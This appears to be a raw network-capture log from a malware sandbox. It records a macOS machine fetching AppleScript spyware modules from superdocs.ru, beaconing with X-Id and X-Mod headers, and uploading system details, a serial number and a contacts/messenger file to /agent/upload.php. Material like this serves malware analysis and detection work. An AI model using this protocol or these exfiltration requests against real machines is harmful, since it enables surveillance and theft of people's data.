2022-08-24 09:19:27 UTC	228	IN	Data Raw: 31 66 63 31 0d 0a 0a 67 6c 6f 62 61 6c 20 6d 6f 64 75 6c 65 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 75 73 65 72 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 64 46 6f 6c 64 65 72 0a 67 6c 6f 62 61 6c 20 6c 6f 67 46 69 6c 65 0a 0a 0a 73 65 74 20 6d 6f 64 75 6c 65 4e 61 6d 65 20 74 6f 20 22 63 6f 6e 74 61 63 74 73 22 0a 73 65 74 20 75 73 65 72 4e 61 6d 65 20 74 6f 20 64 6f 20 73 68 65 6c 6c 20 73 63 72 69 70 74 20 22 77 68 6f 61 6d 69 22 0a 73 65 74 20 64 46 6f 6c 64 65 72 20 74 6f 20 50 4f 53 49 58 20 70 61 74 68 20 6f 66 20 28 28 70 61 74 68 20 74 6f 20 6d 65 20 61 73 20 74 65 78 74 29 20 26 20 22 3a 3a 22 29 0a 0a 0a 0a 0a 6f 6e 20 6c 6f 67 20 28 6d 65 73 73 61 67 65 29 0a 09 73 65 74 20 6d 65 73 73 61 67 65 20 74 6f 20 71 75 6f 74 65 64 20 66 6f 72 6d 20 6f 66 20 6d Data Ascii: 1fc1global moduleNameglobal userNameglobal dFolderglobal logFileset moduleName to "contacts"set userName to do shell script "whoami"set dFolder to POSIX path of ((path to me as text) & "::")on log (message)set message to quoted form of m

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.0.53	49337	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:30 UTC	236	OUT	GET /agent/bin/icons/Empty.icns HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: /
2022-08-24 09:19:30 UTC	236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:30 GMT Content-Type: application/octet-stream Content-Length: 31308 Last-Modified: Thu, 18 Aug 2022 07:36:55 GMT Connection: close ETag: "62fdec17-7a4c" Accept-Ranges: bytes
2022-08-24 09:19:30 UTC	236	IN	Data Raw: 69 63 6e 73 00 00 7a 4c 69 63 31 32 00 00 00 ad 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 5f 49 44 41 54 78 01 ed d0 01 0d 00 00 00 c2 a0 f7 4f 6d 0e 37 88 40 61 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c bc 0f 0c 40 40 00 01 16 41 98 eb 00 00 00 00 49 45 4e 44 ae 42 60 82 69 63 30 37 00 00 01 84 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 36 49 44 41 54 78 01 ed d0 31 01 00 00 00 c2 a0 f5 Data Ascii: icnszLic12PNGIHDR@@iqsRGB_IDATxOm7@a0`0`0`0`0`0`0`@@AIENDB`ic07PNGIHDR>asRGB6IDATx1
2022-08-24 09:19:30 UTC	252	IN	Data Raw: 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 Data Ascii: 0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.0.53	49339	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:33 UTC	267	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: contacts Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:33 UTC	267	OUT	Data Raw: 6d 6f 64 75 6c 65 20 6c 61 75 6e 63 68 65 64 Data Ascii: module launched
2022-08-24 09:19:33 UTC	267	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:33 UTC	267	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.0.53	49338	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:35 UTC	267	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 49 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:35 UTC	267	OUT	Data Raw: 6d 61 70 70 69 6e 67 3a 20 63 6f 6e 74 61 63 74 73 20 2d 20 63 6f 6d 2e 75 74 69 6c 73 2e 63 6f 72 65 2e 66 69 6c 65 73 79 73 74 65 6d 2e 61 70 70 Data Ascii: mapping: contacts - com.utils.core.filesystem.app
2022-08-24 09:19:35 UTC	268	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:35 UTC	268	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.0.53	49340	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:36 UTC	268	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: contacts Content-Length: 65 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:36 UTC	268	OUT	Data Raw: 73 74 61 72 74 69 6e 67 20 73 65 72 76 65 72 20 75 70 6c 6f 61 64 20 66 6f 72 20 63 6f 6e 74 61 63 74 73 2e 74 78 74 2e 20 45 78 70 65 63 74 65 64 20 66 69 6c 65 20 73 69 7a 65 3a 20 31 20 4d 42 Data Ascii: starting server upload for contacts.txt. Expected file size: 1 MB
2022-08-24 09:19:36 UTC	268	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:36 UTC	268	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.0.53	49305	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:18:56 UTC	15	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 164 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:18:56 UTC	15	OUT	Data Raw: 4d 61 63 4f 53 20 76 65 72 73 69 6f 6e 3a 20 31 32 2e 35 2c 20 65 6e 5f 43 48 2e 20 53 65 72 69 61 6c 3a 20 43 30 37 47 56 30 4b 5a 50 4a 48 38 2e 20 46 69 72 65 77 61 6c 6c 3a 20 30 2e 20 53 49 50 3a 20 30 2c 20 53 61 66 61 72 69 3a 20 31 35 2e 36 2c 20 43 50 55 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 20 69 35 2d 38 35 30 30 42 20 43 50 55 20 40 20 33 2e 30 30 47 48 7a 20 44 65 66 61 75 6c 74 20 62 72 6f 77 73 65 72 3a 20 63 6f 6d 2e 61 70 70 6c 65 2e 73 61 66 61 72 69 Data Ascii: MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari
2022-08-24 09:18:57 UTC	15	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:18:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:18:57 UTC	15	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.0.53	49341	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:37 UTC	268	OUT	POST /agent/upload.php?serial=C07GV0KZPJH8 HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Users: pedro X-Mod: contacts Content-Length: 602 Content-Type: multipart/form-data; boundary=------------------------66cd02723440dbce
2022-08-24 09:19:37 UTC	268	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 36 63 64 30 32 37 32 33 34 34 30 64 62 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 66 69 6c 65 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 51 51 20 69 6e 73 74 61 6c 6c 65 64 3a 20 66 61 6c 73 65 0a 51 51 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 57 65 43 68 61 74 20 69 6e 73 74 61 6c 6c 65 64 3a 20 66 61 6c 73 65 0a 57 65 43 68 61 74 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d Data Ascii: --------------------------66cd02723440dbceContent-Disposition: form-data; name="file"; filename="file.txt"Content-Type: text/plainQQ installed: falseQQ not found.-------------------------WeChat installed: falseWeChat not found.---------------
2022-08-24 09:19:37 UTC	269	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:37 UTC	269	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.0.53	49342	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:38 UTC	269	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: contacts Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:38 UTC	269	OUT	Data Raw: 6d 6f 64 75 6c 65 20 66 69 6e 69 73 68 65 64 Data Ascii: module finished
2022-08-24 09:19:38 UTC	269	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:38 UTC	269	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.0.53	49343	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:40 UTC	269	OUT	POST /agent/scripts/telegram.applescript HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / Content-Length: 10 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:40 UTC	270	OUT	Data Raw: 75 73 65 72 3d 70 65 64 72 6f Data Ascii: user=pedro
2022-08-24 09:19:40 UTC	270	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:40 UTC	270	IN	Data Raw: 31 33 64 36 0d 0a 0a 0a 67 6c 6f 62 61 6c 20 6d 6f 64 75 6c 65 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 75 73 65 72 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 64 46 6f 6c 64 65 72 0a 0a 73 65 74 20 6d 6f 64 75 6c 65 4e 61 6d 65 20 74 6f 20 22 74 65 6c 65 67 72 61 6d 22 0a 73 65 74 20 75 73 65 72 4e 61 6d 65 20 74 6f 20 64 6f 20 73 68 65 6c 6c 20 73 63 72 69 70 74 20 22 77 68 6f 61 6d 69 22 0a 73 65 74 20 64 46 6f 6c 64 65 72 20 74 6f 20 50 4f 53 49 58 20 70 61 74 68 20 6f 66 20 28 28 70 61 74 68 20 74 6f 20 6d 65 20 61 73 20 74 65 78 74 29 20 26 20 22 3a 3a 22 29 0a 0a 73 65 74 20 46 4f 52 43 45 44 5f 55 50 44 41 54 45 20 74 6f 20 66 61 6c 73 65 0a 0a 0a 0a 6f 6e 20 6c 6f 67 20 28 6d 65 73 73 61 67 65 29 0a 09 73 65 74 20 6d 65 73 73 61 67 65 20 74 6f 20 71 75 6f 74 Data Ascii: 13d6global moduleNameglobal userNameglobal dFolderset moduleName to "telegram"set userName to do shell script "whoami"set dFolder to POSIX path of ((path to me as text) & "::")set FORCED_UPDATE to falseon log (message)set message to quot

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.0.53	49344	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:42 UTC	275	OUT	GET /agent/bin/icons/Empty.icns HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: /
2022-08-24 09:19:42 UTC	275	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:42 GMT Content-Type: application/octet-stream Content-Length: 31308 Last-Modified: Thu, 18 Aug 2022 07:36:55 GMT Connection: close ETag: "62fdec17-7a4c" Accept-Ranges: bytes
2022-08-24 09:19:42 UTC	275	IN	Data Raw: 69 63 6e 73 00 00 7a 4c 69 63 31 32 00 00 00 ad 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 5f 49 44 41 54 78 01 ed d0 01 0d 00 00 00 c2 a0 f7 4f 6d 0e 37 88 40 61 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c bc 0f 0c 40 40 00 01 16 41 98 eb 00 00 00 00 49 45 4e 44 ae 42 60 82 69 63 30 37 00 00 01 84 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 36 49 44 41 54 78 01 ed d0 31 01 00 00 00 c2 a0 f5 Data Ascii: icnszLic12PNGIHDR@@iqsRGB_IDATxOm7@a0`0`0`0`0`0`0`@@AIENDB`ic07PNGIHDR>asRGB6IDATx1
2022-08-24 09:19:42 UTC	291	IN	Data Raw: 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 Data Ascii: 0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.0.53	49346	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:45 UTC	306	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: telegram Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:45 UTC	306	OUT	Data Raw: 6d 6f 64 75 6c 65 20 6c 61 75 6e 63 68 65 64 Data Ascii: module launched
2022-08-24 09:19:45 UTC	306	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:45 UTC	306	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.0.53	49347	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:46 UTC	306	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: telegram Content-Length: 36 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:46 UTC	306	OUT	Data Raw: 73 65 73 73 69 6f 6e 20 66 6f 6c 64 65 72 20 4e 4f 54 20 66 6f 75 6e 64 2e 20 65 78 69 74 69 6e 67 2e 2e 2e Data Ascii: session folder NOT found. exiting...
2022-08-24 09:19:46 UTC	306	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:46 UTC	306	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.0.53	49345	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:47 UTC	306	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 52 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:47 UTC	307	OUT	Data Raw: 6d 61 70 70 69 6e 67 3a 20 74 65 6c 65 67 72 61 6d 20 2d 20 63 6f 6d 2e 6d 65 74 61 6c 2e 63 6f 72 65 2e 63 6c 6f 75 64 73 65 72 76 69 63 65 73 2e 61 70 70 Data Ascii: mapping: telegram - com.metal.core.cloudservices.app
2022-08-24 09:19:47 UTC	307	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:47 UTC	307	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.0.53	49348	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:47 UTC	307	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: telegram Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:47 UTC	307	OUT	Data Raw: 6d 6f 64 75 6c 65 20 66 69 6e 69 73 68 65 64 Data Ascii: module finished
2022-08-24 09:19:47 UTC	307	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:47 UTC	307	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.0.53	49349	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:51 UTC	307	OUT	POST /agent/scripts/telegram_lite.applescript HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / Content-Length: 10 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:51 UTC	307	OUT	Data Raw: 75 73 65 72 3d 70 65 64 72 6f Data Ascii: user=pedro
2022-08-24 09:19:51 UTC	307	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:51 UTC	308	IN	Data Raw: 31 33 38 64 0d 0a 0a 67 6c 6f 62 61 6c 20 6d 6f 64 75 6c 65 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 75 73 65 72 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 64 46 6f 6c 64 65 72 0a 0a 73 65 74 20 6d 6f 64 75 6c 65 4e 61 6d 65 20 74 6f 20 22 74 65 6c 65 67 72 61 6d 5f 6c 69 74 65 22 0a 73 65 74 20 75 73 65 72 4e 61 6d 65 20 74 6f 20 64 6f 20 73 68 65 6c 6c 20 73 63 72 69 70 74 20 22 77 68 6f 61 6d 69 22 0a 73 65 74 20 64 46 6f 6c 64 65 72 20 74 6f 20 50 4f 53 49 58 20 70 61 74 68 20 6f 66 20 28 28 70 61 74 68 20 74 6f 20 6d 65 20 61 73 20 74 65 78 74 29 20 26 20 22 3a 3a 22 29 0a 0a 0a 0a 0a 6f 6e 20 6c 6f 67 20 28 6d 65 73 73 61 67 65 29 0a 09 73 65 74 20 6d 65 73 73 61 67 65 20 74 6f 20 71 75 6f 74 65 64 20 66 6f 72 6d 20 6f 66 20 6d 65 73 73 61 67 65 0a 09 73 65 74 Data Ascii: 138dglobal moduleNameglobal userNameglobal dFolderset moduleName to "telegram_lite"set userName to do shell script "whoami"set dFolder to POSIX path of ((path to me as text) & "::")on log (message)set message to quoted form of messageset

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.0.53	49350	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:53 UTC	312	OUT	GET /agent/bin/icons/Empty.icns HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: /
2022-08-24 09:19:53 UTC	313	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:53 GMT Content-Type: application/octet-stream Content-Length: 31308 Last-Modified: Thu, 18 Aug 2022 07:36:55 GMT Connection: close ETag: "62fdec17-7a4c" Accept-Ranges: bytes
2022-08-24 09:19:53 UTC	313	IN	Data Raw: 69 63 6e 73 00 00 7a 4c 69 63 31 32 00 00 00 ad 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 5f 49 44 41 54 78 01 ed d0 01 0d 00 00 00 c2 a0 f7 4f 6d 0e 37 88 40 61 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c bc 0f 0c 40 40 00 01 16 41 98 eb 00 00 00 00 49 45 4e 44 ae 42 60 82 69 63 30 37 00 00 01 84 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 36 49 44 41 54 78 01 ed d0 31 01 00 00 00 c2 a0 f5 Data Ascii: icnszLic12PNGIHDR@@iqsRGB_IDATxOm7@a0`0`0`0`0`0`0`@@AIENDB`ic07PNGIHDR>asRGB6IDATx1
2022-08-24 09:19:53 UTC	329	IN	Data Raw: 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 Data Ascii: 0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.0.53	49306	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:18:59 UTC	16	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 33 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:18:59 UTC	16	OUT	Data Raw: 75 70 64 61 74 65 64 20 2e 64 6f 6d 61 69 6e 20 77 69 74 68 20 73 75 70 65 72 64 6f 63 73 2e 72 75 Data Ascii: updated .domain with superdocs.ru
2022-08-24 09:19:00 UTC	16	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:00 UTC	16	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.0.53	49352	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:56 UTC	343	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: telegram_lite Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:56 UTC	344	OUT	Data Raw: 6d 6f 64 75 6c 65 20 6c 61 75 6e 63 68 65 64 Data Ascii: module launched
2022-08-24 09:19:56 UTC	344	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:56 UTC	344	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.0.53	49353	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:57 UTC	344	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: telegram_lite Content-Length: 128 Content-Type: application/x-www-form-urlencoded
